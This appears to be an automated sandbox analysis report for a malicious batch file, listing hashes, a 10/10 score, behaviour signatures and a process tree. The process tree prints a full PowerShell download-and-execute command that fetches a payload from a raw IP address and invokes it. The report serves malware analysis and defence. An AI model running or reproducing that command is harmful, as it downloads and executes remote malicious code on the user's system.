Overview

overview

10

Static

static

dTSMxBv5.bat

windows7_x64

10

dTSMxBv5.bat

windows10_x64

10

Analysis

  • max time kernel
    111s
  • max time network
    102s
  • platform
    windows7_x64
  • resource
    win7v200213
  • submitted
    13-02-2020 23:10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    dTSMxBv5.bat

  • Size

    190B

  • MD5

    b43fc9677f0267630d7259cae180102b

  • SHA1

    47b41ad33d7109bec3a432b7dd105153f0ba610b

  • SHA256

    656e7d92a11142f16b80b527eee75b122b5c19143c2c21da4c37af0d5bf57d7a

  • SHA512

    88804f6050a25e4861b337a9f4db75d21706ab81f15cb1d77b6aa29349e6534af25025cd5ec800f36136124aa37a2f99f241108a7355fcf71bfa6aaac9ffd492

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/dTSMxBv5

Signatures

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Blacklisted process makes network request 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\dTSMxBv5.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1600
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/dTSMxBv5');Invoke-GUHPOFB;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      PID:1624

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads